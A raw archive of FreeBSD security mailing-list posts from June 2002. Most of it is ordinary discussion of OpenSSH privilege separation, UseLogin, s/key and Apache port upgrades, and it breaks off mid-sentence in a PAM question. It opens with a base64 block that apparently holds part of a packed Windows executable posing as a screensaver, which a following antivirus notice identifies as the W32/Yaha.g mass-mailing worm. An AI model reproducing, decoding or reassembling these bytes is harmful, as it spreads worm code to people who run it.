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 +IDr6AHwiQeDxwWJ2OLZjb4AIAEAiwcJwHRFi18EjYQwGEcBAAHzUIPHCP+WuEcBAJWKB0cIwHTc ifl5Bw+3B0dQR7lXSPKuVf+WvEcBAAnAdAeJA4PDBOvY/5bARwEAYek7Hf//AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAwAAACgAAIAOAAAAaAAAgBAAAACoAACAAAAAAAAAAAAA AAAAAAABAAEAAABAAACAAAAAAAAAAAAAAAAAAAABAAkEAABYAAAA7FABAOgCAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAQBsAAAAgAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAAmAAAANhTAQAUAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAMAAAIAAAAAAAAAAAAAAAAAAAAEACQQAANgAAADwUwEA KAMAAAAAAAAAAAAAGCQBACgAAAAgAAAAQAAAAAEABAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP// AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAPoAAAAAAAAAAAAAAAAAAAD6AAAAAAAAAAAAAAAAAAAPqqAAAAAAAAAAAAAAAAAAD6qgAAAA AAAAAAAAAAAAAPqqqgAAAAAAAAAAAAAAAAD6qqoAAAAAAAAAAAAAAAAPqqqqoAAAAAAAAAAAAAAA +qqqqqoAAAAAAAAAAAAAD6qqqqqqoAAAAAAAAAAAAA+qqqqqqqAAAAAAAAAAAAD6qqqqqqqqAAAA AAAAAAAPqqqqqqqqqqAAAAAAAAAA+qqqqqqqqqqqAAAAAAAAD6qqqqqqqqqqqqAAAAAAAPqqqqqq qqqqqqqqAAAAAAD6qqqqqqqqqqqqqgAAAAAPqqqqqqqqqqqqqqqgAAAAD6qqqqqqqqqqqqqqoAAA APqqqqqqqqqqqqqqqqoAAAD6qqqqqqqvqqqqqqqqAAAA+qqqqqqqAPqqqqqqqgAAAPqqqqqqqgD6 qqqqqqoAAAAPqqqqqqAAD6qqqqqgAAAAD6qqqqqgAA+qqqqqoAAAAAD/qqqqAAAA/6qqqgAAAAAA AP///wAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAD//////////////////H////x////4P///+D////Af///wH///4A///8AH//+AA///gAP/ /wAB//4AAP/8AAB/+AAAP/AAAB/wAAAf4AAAD+AAAA/AAAAHwAAAB8ABAAfAAQAH4AOAD+ADgA/w B8Af/A/wP////////////////wAnAQAAAAEAAQAgIBAAAQAEAOgCAAABAPAgAQAoAzQAAABWAFMA XwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAUAAgAAAAAABQACAAAAPwAA AAAAAAAEAAQAAQAAAAAAAAAAAAAAAAAAAIgCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA bwAAAGQCAAABADAANAAwADkAMAA0AGIAMAAAADIADQABAEMAbwBtAG0AZQBuAHQAcwAAAFMAYwBy AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy bmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAHGMtKSlgW5Y/6d+bUDKoUPcsJ7fL2Tf5dTiDA6xhlaxB0X2vrQm+zAhXJNYmLMOgAVUbG+qd BG5OdxcT7w4LZS7r2CxQTthmJAfx3px94lf5Ke4NR99szHOCxN3t5JBmOIWHZbzHdfFOeqbGEVrg asOYornbR4Agt3XSiwGf3n3dw98RVBSgwICPZ8rN7ipofAjckoJbjO0vzVw6POkY89cXOAcxiRGo 4IBTH8U/hmqV9WsGp1ZsZCR5fV1o+NjMTEnETD5fwRXYy4srkvOAL6GZFXKJWoUsFatxTQIaQm0+ pdDtCap4LhFbPWeY3rYTbyCSpBtqhrnM9iqJVWWwFyGXfxm+RxhsU3NVY/RKf+vjRYYh51Xe4D9E vKw7rVlgjPjyAYfxKDLGgfCubbC4RGcMsdZdv0c5eb9Qa16/ppmGGG8R9laaR4ycKDODRGcvXOaU qYU60d0PFKSeOUeJsuxv9KKh1vAJRObHh3vbXl1risJzQSBIjmkV4grgn3guNN+dRZ7EKX+XFdzX SYvJM3z46XT5ocKHdjLbsR0jQwOyrnShvzN3T3YNTQyY9yJopJ6FqwbO6cE324fHfNFVBjuAbXe2 Ec6gCxb0O92PooBeUPiORX/VtPgwpT8y03Vkthugb8A/eUimxKa0OOrenAQI70phZAx1OGQrkFHX C+xQ2eOW5mtFnAA0O6haILhfd0WlbtY0lLimJ9nkhpO1PXFaPO7nD26jzKh8pO9I0gi7zaCBqUzc uCqAascig8VLrIt7dE1lvOgOvSHxPmgbdu2+KCS+zwFf0rOoxmwI5rnMuopmTsdUkCGS4lg+OwMA nqWhCYUWUiItdzyLJFJcvfGLFxOpJdh7Zl+EXqtRaNNCRmAReN+tCqDQ1q3qW51RNAIZ2CFgjOR9 6KXk6CKpfOKvnTZcDozOADgsHwgn4qg7czUc9jTk1ntRzsQyDK4of4acVQlBto9YM7m0bE7I84pu O3hRMu+8V8bF40krxMtnlqKqzeN4R+DsK4PqbFXGMhvRou23W9x9OvBv1nWnriQHwWrldpFL --Boundary_(ID_0fHgCsHC2RlJuOIdGk1DTg)-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 8:16:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from web.htc.sk (ns.htc.sk [195.146.149.36]) by hub.freebsd.org (Postfix) with ESMTP id 6FDC837B616 for ; Tue, 25 Jun 2002 08:12:10 -0700 (PDT) From: LNTS/Technical_Support/HTC%HTC X-Priority: 3 (Normal) Date: Tue, 25 Jun 2002 17:11:40 +0200 Subject: Report to Recipient(s) To: freebsd-security@freebsd.org Message-ID: X-MIMETrack: Serialize by Router on Domino/HTC(Release 5.0.9 |November 16, 2001) at 25.06.2002 17:12:40 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Incident Information:- Originator: owner-freebsd-security@FreeBSD.ORG Recipients: freebsd-security@freebsd.org Subject: Fw: Bullshit relations for you WARNING: The file loveshore.scr you received was infected with the W32/Yaha.g@MM virus. The file attachment was not successfully cleaned. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 8:16:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-203.zoominternet.net [24.154.28.203]) by hub.freebsd.org (Postfix) with ESMTP id 9C2AC37B482 for ; Tue, 25 Jun 2002 08:11:38 -0700 (PDT) Received: from topperwein (topperwein [192.168.168.10]) by topperwein.dyndns.org (8.12.3/8.12.3) with ESMTP id g5PFBPLq010859 for ; Tue, 25 Jun 2002 11:11:25 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Tue, 25 Jun 2002 11:11:20 -0400 (EDT) From: Chris BeHanna Reply-To: Chris BeHanna To: FreeBSD Security Subject: Re: How to check if "UsePrivilegeSeparation" works in OpenSSH? In-Reply-To: <4.3.2.7.2.20020625020718.00d715a0@localhost> Message-ID: <20020625111103.X10704-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Brett Glass wrote: > By the way, after getting openssh-portable working on one system, I built > a package (with OPENSSH_OVERWRITE_BASE) and took the package to another > machine. On the second machine, privilege separation wouldn't work when I > installed the port (though the daemon did run). I suspect that there's an > implicit dependency that's not being satisfied. Anyone know what it might be? OpenSSL 0.9.6d? -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net Turning coffee into software since 1990. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 8:48:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from hyperreal.org (taz3.hyperreal.org [209.133.83.22]) by hub.freebsd.org (Postfix) with SMTP id 3CF7937B403 for ; Tue, 25 Jun 2002 08:48:49 -0700 (PDT) Received: (qmail 93585 invoked from network); 25 Jun 2002 15:48:43 -0000 Received: from localhost.hyperreal.org (HELO yez.hyperreal.org) (127.0.0.1) by localhost.hyperreal.org with SMTP; 25 Jun 2002 15:48:43 -0000 Received: (qmail 3252 invoked by uid 1000); 25 Jun 2002 15:50:44 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Jun 2002 15:50:44 -0000 Date: Tue, 25 Jun 2002 08:50:44 -0700 (PDT) From: Brian Behlendorf To: Niels Provos Cc: security@freebsd.org Subject: Re: UseLogin and openssh-portable priv separation In-Reply-To: <20020625105312.GH15772@citi.citi.umich.edu> Message-ID: <20020625084414.K310-100000@yez.hyperreal.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost.hyperreal.org 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Niels Provos wrote: > If you do UseLogin, that means that you will loose privilege > separation after authentication. The Pre-authentication phase is > still privilege separated even with UseLogin enabled. Right, I got that from the man page, but was still slightly unclear: does using UseLogin remove the security that prevents the to-be-released exploit from being exploitable? Sounds like it does not remove that security, *unless* the attack came from someone who successfully authenticated, who could then get root? Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 8:56:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from beta.mwcis.com (port-212-202-173-150.reverse.qdsl-home.de [212.202.173.150]) by hub.freebsd.org (Postfix) with ESMTP id C116837B407 for ; Tue, 25 Jun 2002 08:55:58 -0700 (PDT) Received: from beta.mwcis.com (localhost [127.0.0.1]) by beta.mwcis.com (8.12.3/8.12.3) with ESMTP id g5PFtu30012953; Tue, 25 Jun 2002 17:55:56 +0200 (CEST) (envelope-from mail@beta.mwcis.com) Received: (from mail@localhost) by beta.mwcis.com (8.12.3/8.12.3/Submit) id g5PFttor012952; Tue, 25 Jun 2002 17:55:55 +0200 (CEST) Date: Tue, 25 Jun 2002 17:55:54 +0200 From: Marco Wertejuk To: Chris Johnson Cc: security@FreeBSD.ORG Subject: Re: openssh-portable and s/key passwords Message-ID: <20020625155554.GA12933@beta.mwcis.com> References: <20020625133550.GB57228@palomine.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020625133550.GB57228@palomine.net> User-Agent: Mutt/1.3.28i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Chris, please check if you edited the right configfile, since the openssh port uses /usr/local/etc not /etc. -- Mit freundlichen Gruessen, Marco Wertejuk - mwcis.com Consulting & Internet Solutions To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 8:58:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-203.zoominternet.net [24.154.28.203]) by hub.freebsd.org (Postfix) with ESMTP id E1F9437B403 for ; Tue, 25 Jun 2002 08:58:50 -0700 (PDT) Received: from topperwein (topperwein [192.168.168.10]) by topperwein.dyndns.org (8.12.3/8.12.3) with ESMTP id g5PFwpLq011018 for ; Tue, 25 Jun 2002 11:58:51 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Tue, 25 Jun 2002 11:58:46 -0400 (EDT) From: Chris BeHanna Reply-To: Chris BeHanna To: FreeBSD Security Subject: Re: Apache 1.3.26 port In-Reply-To: <200206191723590704.0033D6FF@mail.speakeasy.net> Message-ID: <20020625115740.B10704-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 19 Jun 2002, Jonathan Arnold wrote: > >I would consider this semi-correct, at least from my experience. The data > >directories ARE seperated out. Notice that there is a data.default and a > > I, in fact, just went through this and would beg to differ. It is not > very kind to delete a complete directory tree without any warning, either > when you install (something like "data.default *WILL BE REPLACED ON > UPGRADE*") or it should check on upgrade and not remove it if it is there. > I lost my entire web site with nary a peep, and luckily had the most important > stuff on another computer. Consider this a plug for keeping your website under source control. This also makes it very easy to run a test mockup on your LAN and then deploy to a customer's hosted server via an SSH tunnel. -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net Turning coffee into software since 1990. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 8:59:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from norton.palomine.net (dsl254-102-179.nyc1.dsl.speakeasy.net [216.254.102.179]) by hub.freebsd.org (Postfix) with SMTP id 0A33337B413 for ; Tue, 25 Jun 2002 08:59:16 -0700 (PDT) Received: (qmail 59524 invoked by uid 1000); 25 Jun 2002 15:59:15 -0000 Date: Tue, 25 Jun 2002 11:59:15 -0400 From: Chris Johnson To: Marco Wertejuk Cc: security@FreeBSD.ORG Subject: Re: openssh-portable and s/key passwords Message-ID: <20020625155915.GA59062@palomine.net> References: <20020625133550.GB57228@palomine.net> <20020625155554.GA12933@beta.mwcis.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="+HP7ph2BbKc20aGI" Content-Disposition: inline In-Reply-To: <20020625155554.GA12933@beta.mwcis.com> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --+HP7ph2BbKc20aGI Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jun 25, 2002 at 05:55:54PM +0200, Marco Wertejuk wrote: > please check if you edited the right configfile, since > the openssh port uses /usr/local/etc not /etc. Yes, I did, and in any case ChallengeResponseAuthentication is the default. Chris --+HP7ph2BbKc20aGI Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GJNSPC78Lz4X/PARAikLAJ0RJHNGhnOW4G554NSe7WpPgEbfiQCfby4Z c9XLbKsxjAGbWcL5HdayLvI= =vd9v -----END PGP SIGNATURE----- --+HP7ph2BbKc20aGI-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 9: 2: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from hex.databits.net (hex.csh.rit.edu [129.21.60.134]) by hub.freebsd.org (Postfix) with ESMTP id 81B5837B49A for ; Tue, 25 Jun 2002 09:00:34 -0700 (PDT) Received: by hex.databits.net (Postfix, from userid 1001) id 488702111C; Tue, 25 Jun 2002 12:00:30 -0400 (EDT) Date: Tue, 25 Jun 2002 12:00:30 -0400 From: Pete Fritchman To: Chris BeHanna Cc: FreeBSD Security Subject: Re: Apache 1.3.26 port Message-ID: <20020625120030.A31122@absolutbsd.org> References: <200206191723590704.0033D6FF@mail.speakeasy.net> <20020625115740.B10704-100000@topperwein.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020625115740.B10704-100000@topperwein.dyndns.org>; from behanna@zbzoom.net on Tue, Jun 25, 2002 at 11:58:46AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ++ 25/06/02 11:58 -0400 - Chris BeHanna: | > I, in fact, just went through this and would beg to differ. It is not | > very kind to delete a complete directory tree without any warning, either | > when you install (something like "data.default *WILL BE REPLACED ON | > UPGRADE*") or it should check on upgrade and not remove it if it is there. | > I lost my entire web site with nary a peep, and luckily had the most important | > stuff on another computer. | | Consider this a plug for keeping your website under source | control. This also makes it very easy to run a test mockup on your | LAN and then deploy to a customer's hosted server via an SSH tunnel. Check out /usr/ports/www/mod_cvs to make this easier, too. --pete -- Pete Fritchman [petef@(databits.net|freebsd.org|csh.rit.edu)] finger petef@databits.net for PGP key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 11:14:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from lucubration.notgod.com (node-216-136-154-51.networks.paypal.com [216.136.154.51]) by hub.freebsd.org (Postfix) with SMTP id 2FBAD37B426 for ; Tue, 25 Jun 2002 11:14:14 -0700 (PDT) Received: (qmail 11416 invoked from network); 25 Jun 2002 18:14:33 -0000 Received: from unknown (HELO notgod.com) (64.168.159.218) by node-216-136-154-51.networks.paypal.com with SMTP; 25 Jun 2002 18:14:31 -0000 Message-ID: <3D18B2D9.6030203@notgod.com> Date: Tue, 25 Jun 2002 11:13:45 -0700 From: Brian Nelson User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020606 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Niels Provos Cc: Brian Nelson , FreeBSD Security Subject: Re: ENOUGH!!! Re: [openssh-unix-announce] Re: Upcoming OpenSSH vu lner ability (fwd) References: <20020625103648.GG15772@citi.citi.umich.edu> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Level: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Niels Provos wrote: > Privilege Separation has been committed to OpenSSH in the middle of > March this year. It is not just a few days old. --- QUOTING THEO --- OpenSSH 3.3p was released a few days ago, with various improvements but in particular, it significantly improves the Linux and Solaris support for priv sep. However, it is not yet perfect. Compression is disabled on some systems, and the many varieties of PAM are causing major headaches. --- END QUOTING THEO --- That would make this release "a few days old"... and has platform support issues, according to this announcement. I have heard no official response form FreeBSD about the stability/ability to privsep on FreeBSD from anyone I remotely trust. So far, against all odds, Brett Glass has had the most stable, unemotional, and responsible response to this whole issue... everyone else likes to yell at you when you don't trust whatever they say because they are "big head figures" or suffering from "Young Geek Ego(tm)". To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 11:19:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from intense.net (server.intense.net [199.217.236.1]) by hub.freebsd.org (Postfix) with ESMTP id 28E0B37B401 for ; Tue, 25 Jun 2002 11:19:15 -0700 (PDT) Received: (from root@localhost) by intense.net (8.12.3/8.12.3) id g5PIJEFm000851 for freebsd-security@freebsd.org; Tue, 25 Jun 2002 13:19:14 -0500 (CDT) (envelope-from bobber@intense.net) Received: from bob (209.248.134.245.nw.nuvox.net [209.248.134.245]) by intense.net (8.12.3/8.12.3av) with SMTP id g5PIJBot000843 for ; Tue, 25 Jun 2002 13:19:11 -0500 (CDT) (envelope-from bobber@intense.net) Message-ID: <032501c21c74$36840140$6c01a8c0@metropark.metropark.com> From: "Robert Herrold" To: Subject: PAM Date: Tue, 25 Jun 2002 13:14:52 -0500 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On a recent upgrade to 4.6, somehow PAM intervened and 